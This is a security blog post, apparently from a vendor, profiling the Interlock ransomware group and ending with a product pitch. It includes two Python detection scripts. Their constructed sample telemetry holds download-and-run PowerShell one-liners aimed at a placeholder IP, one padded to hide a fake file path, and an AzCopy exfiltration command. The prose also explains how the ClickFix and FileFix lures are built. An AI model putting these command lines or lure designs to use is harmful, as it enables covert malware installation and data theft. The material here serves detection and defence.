Last Updated: September 17th, 2025 | 10 min read | Categories: Data Exfiltration, Ransomware, Variants


Why Interlock Ransomware Matters Now

Interlock ransomware has gone from an unknown threat to a top-tier group in less than a year. In 2025, it has disrupted hospitals, city governments, and regional enterprises, showing it is far from a niche campaign. A healthcare ransomware attack can cancel surgeries, delay treatments, and risk patient lives, while citywide incidents have paralyzed local government services.

What makes Interlock stand out is the way it combines social engineering with a double extortion ransomware model that pressures victims on two fronts: operational downtime and public exposure through a data leak site. CISA and the FBI issued a joint #StopRansomware advisory on the group in July 2025, a measure of how urgently defenders need to study its methods. The group’s blend of drive-by downloads, browser-based lures, and patient, low-and-slow intrusions shows how far ransomware has moved beyond crude spam campaigns.

Background & Emergence

Interlock Ransomware first appeared in September 2024, identified by the “.interlock” extension left on encrypted files. Its operators quickly started leveraging the double extortion ransomware model, encrypting systems while stealing sensitive data to pressure victims into paying.

From the outset, Interlock targeted both Windows and Linux environments and even developed a rare FreeBSD variant, demonstrating cross-platform capabilities uncommon for new groups. At the beginning, Interlock did not operate like a large ransomware-as-a-service (RaaS) collective. Instead, it behaved more like a closed crew, running its own infrastructure and leak site rather than outsourcing. The gang’s early campaigns hit education, healthcare, and government organizations across the U.S. and Europe.

By winter 2024, it had already gained a reputation for persistence, using backdoors and having long dwell times before launching encryption. These traits, coupled with an aggressive targeting strategy, aligned Interlock with big-game hunting ransomware groups that prioritize maximum disruption and payout potential. Its emergence set the stage for the escalation that followed throughout 2025.

Why Data Loss Prevention is Critical for Businesses

The biggest risks of data loss are financial. IBM’s 2025 Cost of a Data Breach Report, for instance, puts the global average cost of a breach at $4.44 million, and the figure climbs steeply for firms in heavily regulated sectors.

Healthcare organizations subject to HIPAA are especially exposed because of the sensitivity of the data they hold and the size of the regulatory penalties for failing to protect it. IBM’s research found healthcare faced the highest costs of any sector, with average breach costs of $7.42 million, followed by financial services at $5.56 million.

Almost every business, however, holds some form of personally identifiable information (PII) that has value to attackers. Regulations such as GDPR can impose large fines for exposing such data, on top of the severe reputational damage that poor data handling causes.

Unique Entry Techniques & Infection Chain

Unlike many groups that lean heavily on email phishing, Interlock relies on an infection chain built on web-based deception. The gang uses drive-by downloads from compromised websites, typically dressed up as fake browser-update installers. Victims believe they are running a legitimate Chrome or Edge update; what actually executes is a hidden PowerShell payload.

Another hallmark tactic is the ClickFix technique.

Here, users land on a fraudulent CAPTCHA or error page that instructs them to press a sequence of keys, typically Win+R, Ctrl+V and Enter. The page has already placed a command on the clipboard, so the keystrokes paste it into the Windows Run dialog and execute it: the victim installs the malware for the attacker, and no exploit is involved. In 2025, Interlock added FileFix social engineering, a variant first demonstrated publicly as a proof of concept in June 2025 that abuses the Windows File Explorer address bar instead. The victim pastes what looks like a file path, but the string is a PowerShell command padded with spaces so that only a fake path in a trailing comment remains visible in the bar.

Together, these ploys create a user-led Interlock ransomware attack chain: initial access through deception, payload execution via PowerShell, and a foothold established without tripping obvious alarms. Because the victim, not an exploit, launches the interpreter, there is no vulnerability to patch, and the first process tree (explorer.exe spawning powershell.exe) can pass for ordinary user activity unless defenders look for it specifically. This goes a long way toward explaining why Interlock’s campaigns have been unusually successful against defenses tuned for malicious attachments and exploit kits.
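The following Python is an added example, not code from the original post or from any vendor, showing how the ClickFix and FileFix lures described above look in endpoint telemetry and how to flag them. It assumes process-creation events in a Sysmon-style shape (parent image, image, command line, user) and `reg query` output for the Run dialog’s RunMRU history; every sample event, IP address (203.0.113.0/24 is the RFC 5737 documentation range) and path is constructed. The FileFix check keys on the published proof-of-concept shape: a real command, a run of padding spaces, then a `#` comment holding a fake file path.

```python
"""Flag ClickFix / FileFix-style execution in constructed Windows telemetry.

Both lures end with the victim pasting attacker text that Windows then runs:
via the Run dialog (ClickFix) or the File Explorer address bar (FileFix).
Either way the interpreter's parent process is explorer.exe, which is rare
for legitimate PowerShell use and is the pivot these checks key on.
"""
import re
from dataclasses import dataclass
from typing import Optional

INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe"}

# Flags and cmdlets typical of pasted one-liners: hidden window, encoded
# command, fetch-from-URL and run-in-memory.
SUSPICIOUS_TOKENS = re.compile(
    r"(?i)(-w(indow(style)?)?\s+h(idden)?|-enc(odedcommand)?\b|\biex\b|"
    r"invoke-expression|\birm\b|invoke-restmethod|invoke-webrequest|"
    r"downloadstring|\bcurl\s+http|mshta\s+http)"
)

# FileFix proof-of-concept shape: the real command, a run of spaces, then a
# '#' comment holding a fake file path so only the path is visible in the bar.
FILEFIX_COMMENT = re.compile(r'#\s*[A-Za-z]:\\[^\s"]+')


@dataclass
class Finding:
    rule: str
    user: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_process_event(ev: dict) -> Optional[Finding]:
    """Apply both rules to one process-creation event (Sysmon 1 / 4688 shape)."""
    parent = basename(ev["parent_image"])
    image = basename(ev["image"])
    cmd = ev["command_line"]
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return None
    if FILEFIX_COMMENT.search(cmd):
        return Finding("filefix_address_bar_paste", ev["user"], cmd)
    if SUSPICIOUS_TOKENS.search(cmd):
        return Finding("clickfix_explorer_spawned_interpreter", ev["user"], cmd)
    return None


def scan_events(events) -> list:
    return [f for f in (check_process_event(e) for e in events) if f is not None]


# RunMRU is the Run dialog's history; a ClickFix paste leaves the full command
# there, terminated by the literal marker "\1". Input mirrors `reg query` output.
RUNMRU_LINE = re.compile(r"^\s*(?P<slot>[a-z])\s+REG_SZ\s+(?P<value>.*?)\\1\s*$")


def triage_runmru(reg_export: str) -> list:
    """Return Run-dialog history entries that look like pasted one-liners."""
    hits = []
    for line in reg_export.splitlines():
        m = RUNMRU_LINE.match(line)
        if m and SUSPICIOUS_TOKENS.search(m.group("value")):
            hits.append(m.group("value"))
    return hits


# Constructed sample telemetry (not real IOCs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"user": r"CORP\jdoe", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r'powershell -w hidden -c "irm http://203.0.113.10/verify | iex"'},
    {"user": r"CORP\jdoe", "parent_image": r"C:\Windows\explorer.exe", "image": PS,
     "command_line": r'powershell.exe -c "curl http://203.0.113.10/f | iex"'
                     r'                              # C:\company\internal-secure\filedrive\HRPolicy.docx'},
    {"user": r"CORP\svc_inv", "parent_image": r"C:\Windows\System32\svchost.exe", "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"},
    {"user": r"CORP\jdoe", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "command_line": "notepad.exe"},
]

SAMPLE_RUNMRU = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
    a    REG_SZ    powershell -w h -c "irm http://203.0.113.10/verify | iex"\1
    b    REG_SZ    mstsc\1
    MRUList    REG_SZ    ba
"""

if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.user}: {f.command_line[:80]}")
    for value in triage_runmru(SAMPLE_RUNMRU):
        print(f"[runmru_history] {value}")
```

Of the four constructed events, only the two explorer-spawned PowerShell launches fire; the scheduled script under svchost.exe and the Notepad launch stay quiet. The RunMRU pass is the forensic counterpart: when the endpoint agent missed the launch, the pasted command is usually still sitting in the user’s Run history.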

Inside the Attack: Tools, Dwelling & Exfiltration

Once inside, Interlock deploys a RAT-based payload to establish control. This backdoor provides remote access that lets the operators escalate privileges and stage additional tools. Keyloggers and credential dumpers harvest passwords, enabling lateral movement over RDP or through remote access tools such as AnyDesk. The group has been observed dwelling in networks for weeks before encryption begins, leaving responders a long forensic timeline to reconstruct.

During this stage, data theft takes priority. Interlock is notable for using cloud-native tools: it has employed Microsoft’s Azure Storage Explorer and AzCopy to move gigabytes of data into attacker-controlled Azure blob containers. Because the destination is a legitimate Microsoft domain (*.blob.core.windows.net), the transfer blends in with normal cloud traffic unless defenders baseline which storage accounts the organization actually uses and alert on AzCopy or Storage Explorer appearing on hosts that have no business running them. Stolen data is later posted on Interlock’s data leak site if victims refuse to pay.

When ready, the group deploys its encryptor, a binary named conhost.exe to pass as the legitimate Windows console host, and encrypts files across servers and shares, appending the .interlock extension. The result is complete operational disruption combined with the threat of exposure, an attack model designed to maximize leverage.
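As an added example (not code from the original post or from any vendor), the Python below turns the two post-compromise behaviors just described into checks a SOC could run over process-creation telemetry: AzCopy pointed at a storage account the organization does not own, and a conhost.exe running from anywhere but System32. The allowlist of storage accounts, the host names and every sample event are constructed; the `sig=` heuristic reflects that a shared access signature token, when present, is carried in the blob URL itself.

```python
"""Two post-compromise checks over constructed Windows process telemetry.

1. AzCopy runs whose destination storage account is not one the organization
   owns: the destination host is Microsoft's (*.blob.core.windows.net), so the
   account name, not the domain, is what separates backup jobs from exfiltration.
2. A binary named conhost.exe executing outside System32: the legitimate console
   host lives there, so any other path is masquerading (ATT&CK T1036.005).
"""
import re
from typing import List, Optional, Tuple
from urllib.parse import urlsplit

# Storage accounts this fictional organization legitimately uses (assumption:
# in practice, build this set from your Azure inventory).
SANCTIONED_STORAGE_ACCOUNTS = {"corpbackupprod01", "corpfileshare"}

# Azure storage account names are 3-24 lowercase letters and digits.
BLOB_HOST = re.compile(r"^(?P<account>[a-z0-9]{3,24})\.blob\.core\.windows\.net$")
URL = re.compile(r"""https://[^\s"']+""")

LEGIT_CONHOST_DIR = r"c:\windows\system32"


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def azcopy_destinations(command_line: str) -> List[str]:
    """Storage account names of every blob URL in an azcopy command line."""
    accounts = []
    for m in URL.finditer(command_line):
        host = (urlsplit(m.group(0)).hostname or "").lower()
        hm = BLOB_HOST.match(host)
        if hm:
            accounts.append(hm.group("account"))
    return accounts


def check_azcopy(ev: dict) -> Optional[str]:
    if basename(ev["image"]) != "azcopy.exe":
        return None
    cmd = ev["command_line"]
    unknown = [a for a in azcopy_destinations(cmd) if a not in SANCTIONED_STORAGE_ACCOUNTS]
    if not unknown:
        return None
    # A SAS token in the URL ("sig=") means the credential travelled with the
    # command line: the attacker needs no identity in the victim's Azure tenant.
    note = " (SAS token in URL)" if "sig=" in cmd else ""
    return f"azcopy to unsanctioned storage account(s) {unknown}{note}"


def check_conhost_masquerade(ev: dict) -> Optional[str]:
    path = ev["image"].replace("/", "\\")
    if basename(path) != "conhost.exe":
        return None
    directory = path.rsplit("\\", 1)[0].lower()
    if directory == LEGIT_CONHOST_DIR:
        return None
    # Treat as a triage signal, not an auto-block: confirm with hash and signature.
    return f"conhost.exe executing from unexpected path {ev['image']}"


def triage(events) -> List[Tuple[str, str]]:
    """Return (host, message) for every event that trips either check."""
    out = []
    for ev in events:
        for check in (check_azcopy, check_conhost_masquerade):
            msg = check(ev)
            if msg:
                out.append((ev["host"], msg))
    return out


# Constructed sample events (not real IOCs).
SAMPLE_EVENTS = [
    {"host": "FS01", "image": r"C:\Users\Public\azcopy.exe",
     "command_line": r'azcopy.exe copy "D:\Shares\Finance" '
                     r'"https://unknownstore9.blob.core.windows.net/data?sv=2022-11-02&ss=b&sig=REDACTED" '
                     r'--recursive=true'},
    {"host": "BK01", "image": r"C:\Program Files\azcopy\azcopy.exe",
     "command_line": r'azcopy.exe sync "E:\Backups" '
                     r'"https://corpbackupprod01.blob.core.windows.net/nightly?sv=2022-11-02&sig=REDACTED"'},
    {"host": "FS01", "image": r"C:\Users\Public\Music\conhost.exe", "command_line": "conhost.exe"},
    {"host": "FS01", "image": r"C:\Windows\System32\conhost.exe",
     "command_line": r"\??\C:\WINDOWS\system32\conhost.exe 0x4"},
]

if __name__ == "__main__":
    for host, msg in triage(SAMPLE_EVENTS):
        print(f"{host}: {msg}")
```

The nightly backup job to the sanctioned account and the genuine console host both pass; the copy from a public user directory to an unknown account and the conhost.exe under a Music folder are the two that surface. Tuning the storage allowlist is the whole game for the first check: a domain-level block on blob.core.windows.net would also break legitimate backups, which is exactly why the attacker picked it.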

Targets & Impact: Who is at Risk?

Interlock’s targeting is opportunistic yet strategic. Its victims span government, education, manufacturing, and technology, yet the most alarming incidents have been in healthcare.

A healthcare ransomware attack has disproportionate impact: downtime can delay treatments, expose medical records, and risk patient safety. Hospitals in the U.S. and Europe have already been forced offline by Interlock, illustrating its capability to hit critical services.

The group’s opportunism mirrors that of other big-game hunting ransomware crews, but its methods allow it to scale down as well. Regional practices and community organizations have also appeared on its leak site.

Geographically, campaigns concentrate on North America and Europe, but nothing suggests attackers will stop there. By combining opportunistic targeting with high-impact industries, Interlock amplifies its pressure campaign.

Any organization that handles sensitive data, operates mission-critical infrastructure, or cannot afford downtime should consider itself at risk. In other words: the net is wide, and the stakes are high.

Recent Trends: Escalation & New Tactics

2025 has unfortunately been the year of Interlock’s escalation.

The volume of victims listed on its data leak site surged through spring and summer, with hospitals, city governments, and private companies all making appearances. Analysts observed that the introduction of FileFix social engineering marked a tactical shift, broadening the group’s toolkit.

Meanwhile, its payloads gained obfuscation features designed to bypass endpoint detection and response (EDR) tools, showing that the developers are actively iterating. U.S. government advisories from CISA and the FBI confirmed these evolutions, warning defenders to expect more stealth, more automation, and more widespread targeting.

Interlock is no longer just another gang; it is a headline actor in the global ransomware ecosystem. Its playbook demonstrates how ransomware tactics, techniques, and procedures (TTPs) evolve quickly: from ClickFix to FileFix, from on-premises exfiltration to cloud-based theft. Each change increases both the speed and the effectiveness of campaigns.

Healthcare Breaches & Lessons Learned


Healthcare has been hardest hit by Interlock’s campaigns, offering difficult lessons for defenders. A large U.S. dialysis provider suffered a ransomware attack in April 2025, with more than two million patient records exfiltrated before encryption. The breach forced clinics into manual operations and resulted in weeks of disruption.

Soon after, an Ohio hospital system with 14 facilities went dark when Interlock compromised its IT backbone. Emergency patients were diverted, procedures delayed, and recovery took more than two weeks. Experts concluded that inadequate network segmentation allowed ransomware to propagate across the hospital network.

Another incident at a university health system showed how long attackers can dwell undetected, up to 17 days in some cases, before triggering encryption. The common thread across these breaches is that lack of visibility, segmentation gaps, and limited incident response readiness left organizations vulnerable.

Defensive Playbook: Mitigation & Response

Fighting Interlock requires layered mitigation that addresses both prevention and response. Start with DNS filtering and a secure web gateway to block known-malicious sites and cut off drive-by downloads. Train users on the ClickFix and FileFix lures specifically: no legitimate CAPTCHA or file share ever asks you to press Win+R or paste text into the Run dialog or the Explorer address bar. Where users do not need it, the Explorer policy that removes the Run menu (NoRun) also disables Win+R and blunts ClickFix, though it does nothing against FileFix, which is why awareness has to be backed by detection.

Deploy EDR tuned to flag PowerShell or cmd.exe launched by explorer.exe with hidden-window, encoded, or download-and-execute arguments; unexpected remote access tools; and AzCopy, Storage Explorer, or Rclone on hosts that have no business running them. Enabling PowerShell script block logging (Event ID 4104) captures the pasted one-liner itself. Implement zero trust principles and enforce network segmentation so that a single compromised machine cannot bring down entire systems. Regular patching closes the vulnerabilities attackers exploit once inside to escalate and spread.

Keeping detection rules current and monitoring for Interlock’s published IOCs matters too, with the caveat that domains, IP addresses, and file hashes rotate far faster than behaviors: explorer-spawned interpreters, cloud storage tooling on servers, and system binaries running from the wrong path age far better as detections. By combining user education, technical controls, and practiced recovery, defenders can reduce the risk of catastrophic impact even against a threat like Interlock.

Preparing for the Next Wave of Attacks

Interlock shows where ransomware is heading: harder to detect, more reliant on the user doing the attacker’s work, and more entwined with cloud services. Expect the group to keep refining its methods, whether through new ways in or better tooling for data theft.

It is also likely to keep pushing cross-platform attacks, from Windows servers to virtualization hosts, given that it already ships Windows and FreeBSD encryptors. These tactics will spread across the ransomware ecosystem, meaning other groups may well copy ideas like ClickFix and FileFix.

Ransomware is now a campaign, not a single event. Stealth, persistence, and data theft create the leverage that makes extortion work. Disrupting this process requires more than endpoint detection.

BlackFog’s anti data exfiltration (ADX) technology blocks unauthorized outbound traffic, including misuse of tools like AzCopy or Rclone, preventing attackers from stealing data in the first place. For healthcare, municipal, and infrastructure sectors, ADX adds a proactive layer to your cybersecurity strategy, removing the leverage that makes ransomware effective. Learn more today.

